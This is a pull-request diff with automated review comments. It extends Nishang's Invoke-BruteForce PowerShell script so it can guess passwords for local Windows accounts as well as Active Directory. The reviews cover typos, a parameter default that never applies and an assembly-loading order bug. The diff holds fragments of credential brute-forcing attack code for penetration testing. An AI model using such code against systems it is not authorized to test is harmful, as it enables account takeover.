Added LocalAccounts option to brute force local accounts (non AD) #66

Merged
merged 1 commit into from
Nov 12, 2018
24 changes: 16 additions & 8 deletions Scan/Invoke-BruteForce.ps1
Expand Up @@ -3,13 +3,13 @@ function Invoke-BruteForce
{
<#
.SYNOPSIS
Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.
Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Local Accounts, Web and FTP.

.DESCRIPTION
This payload can brute force credentials for SQL Server, ActiveDirectory, Web or FTP.
This payload can brute force credentials for SQL Server, ActiveDirectory, LocalAccounts, Web or FTP.

.PARAMETER Computername
Specifies a SQL Server, Domain, FTP Site or Web Site.
Specifies a SQL Server, Domain, Computer, FTP Site or Web Site.

.PARAMETER UserList
Specify a list of users. If blank, trusted connection will be used for SQL and an error will be genrated for other services.
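Review bot: The help text names the new mode inconsistently: the .SYNOPSIS says "Local Accounts" while the .DESCRIPTION uses "LocalAccounts", which is the literal -Service value. Use the literal value in both places so it can be copied from the help. In .PARAMETER Computername, "Computer" does not say which service it belongs to; something like "Computer (for LocalAccounts)" would make that clear. The unchanged UserList line at the end of this hunk also still has the typo "genrated".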
Expand All @@ -18,7 +18,7 @@ Specify a list of users. If blank, trusted connection will be used for SQL and a
Specify a list of passwords.

.PARAMETER Service
Enter a Service from SQL, ActiveDirecotry, FTP and Web. Default service is set to SQL.
Enter a Service from SQL, ActiveDirecotry, LocalAccounts, FTP and Web. Default service is set to SQL.

.PARAMETER StopOnSuccess
Use this switch to stop the brute forcing on the first success.
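Review bot: The rewritten .PARAMETER Service line keeps the misspelling "ActiveDirecotry". Since the line is being changed anyway, correct it to "ActiveDirectory" so the help text matches the value the parameter actually accepts.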
Expand Down Expand Up @@ -66,7 +66,7 @@ Goude 2012, TreuSec
[String]
$PasswordList,

[Parameter(Position = 3, Mandatory = $true)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")]
[Parameter(Position = 3, Mandatory = $true)] [ValidateSet("SQL","FTP","ActiveDirectory","LocalAccounts","Web")]
[String]
$Service = "SQL",

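Review bot: On the changed Parameter line, Mandatory = $true sits alongside the default $Service = "SQL", so the default can never take effect and the help sentence "Default service is set to SQL" is misleading. While extending the ValidateSet, either drop Mandatory so the default applies, or drop the default and the help sentence.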
Expand Down Expand Up @@ -214,11 +214,19 @@ Goude 2012, TreuSec
}

#Brute Force Active Directory
elseif ($service -eq "ActiveDirectory")
elseif ($service -eq "ActiveDirectory" -or $service -eq "LocalAccounts")
{
Write-Output "Brute Forcing Active Directory $ComputerName"
if ($service -eq "ActiveDirectory")
{
Write-Output "Brute Forcing Active Directory $ComputerName"
$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
}
else
{
Write-Output "Brute Forcing Local Accounts $ComputerName"
$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Machine
}
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
Try
{
$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, $ComputerName)
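Review bot: The new if/else assigns $contextType from [System.DirectoryServices.AccountManagement.ContextType] before the Add-Type -AssemblyName System.DirectoryServices.AccountManagement line runs, whereas the removed assignment came after it. In a session where that assembly is not already loaded, the type lookup will fail before the Try block is reached; move the Add-Type call above the if/else. The comment "#Brute Force Active Directory" above the elseif also no longer describes both branches and should mention local accounts.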